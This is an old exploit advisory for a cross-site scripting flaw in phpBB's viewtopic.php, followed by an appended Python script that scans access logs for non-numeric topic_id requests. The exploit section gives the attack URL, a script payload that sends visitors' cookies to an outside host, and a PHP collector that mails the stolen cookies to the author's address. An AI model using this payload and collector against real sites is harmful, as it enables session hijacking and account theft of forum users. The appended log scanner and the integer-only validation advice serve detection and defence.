XSS Exploit In phpBB viewtopic.php

A: BACKGROUND [from phpbb.com]

phpBB is a high powered, fully scalable, and highly customisable open-source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

B: DESCRIPTION

The cross-site scripting lets you print HTML, JavaScript or other content in the web page when it is just opened, without it being written in the page.

C: EXPLOIT

This is the URL of the exploit:

http://[site]/phpBB/viewtopic.php?topic_id=[script]

And you can steal the cookie by changing [script] to

<script>document.location='http://any-web-site/cookies.php?'+document.cookie</script>

and in http://any-web-site/cookie.php put

----------------cookie.php-------------------
<?
mail("silentneedle@hotmail.com","cookies from phpbb",$http_cookie);
echo $http_cookie; //or you can send with the variable name
?>
-----------------------------------------------

D: GREETZ

To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , 7azm , King Of Ray , OH SHE IS A LITTLE RUN AWAY[puretone & kelly osbourne] :) and thanks to the last exploit in phpbb :)

E: CONTACT

Silent Needle
silentneedle@hotmail.com

F: OH LONG NIGHT

Bye
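
A defender-side check for the request pattern in section C, added here as an example and not part of the original advisory: it scans web server access-log lines for viewtopic.php requests whose topic_id is not a plain integer. The combined log format, the assumption that legitimate topic_id values are decimal integers, and all function names and sample lines are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_topic_ids(log_lines):
    """Return (line_number, decoded_value) for each viewtopic.php request
    whose topic_id is not a plain decimal integer (assumed legitimate form)."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/viewtopic.php"):
            continue
        # parse_qs decodes one layer; keep blank values so "topic_id=" is seen.
        params = parse_qs(target.query, keep_blank_values=True)
        for raw in params.get("topic_id", []):
            value = decode_fully(raw)
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2002:10:00:00 +0000] "GET /phpBB/viewtopic.php?topic_id=42&forum=1 HTTP/1.0" 200 5120',
    '192.0.2.11 - - [01/Jan/2002:10:00:05 +0000] "GET /phpBB/viewtopic.php?topic_id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 4096',
    '192.0.2.12 - - [01/Jan/2002:10:00:09 +0000] "GET /phpBB/viewtopic.php?topic_id=%253Cb%253E HTTP/1.0" 200 4096',
    '192.0.2.13 - - [01/Jan/2002:10:00:12 +0000] "GET /phpBB/index.php HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for number, value in suspicious_topic_ids(SAMPLE_LOG):
        print(f"line {number}: non-numeric topic_id {value!r}")
```

The same integer-only rule applied on the server before topic_id is used or echoed closes the reflection path; the log scan only shows who has been probing it.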